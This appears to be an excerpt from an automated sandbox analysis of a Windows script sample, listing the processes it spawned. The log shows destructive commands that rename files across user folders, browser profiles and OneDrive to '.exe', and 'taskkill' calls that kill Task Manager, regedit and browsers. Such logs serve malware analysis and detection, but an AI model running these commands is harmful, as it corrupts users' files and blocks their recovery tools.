    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Publishers\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\AcroCef\DC\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temp\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\msedge_url_fetcher_5172_761252224\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\Dictionaries\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\f4d41c5d09ae781\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\Searches\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrocef_low\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Publishers\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temporary Internet Files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\OneDrive\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012023100420231005\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\ConnectedDevicesPlatform\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im notepad.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogonJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im bing.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Microsoft\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Temp\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im microsoftedge.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-JO\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\.ms-ad\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Adobe\Color\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe"Jump to behavior
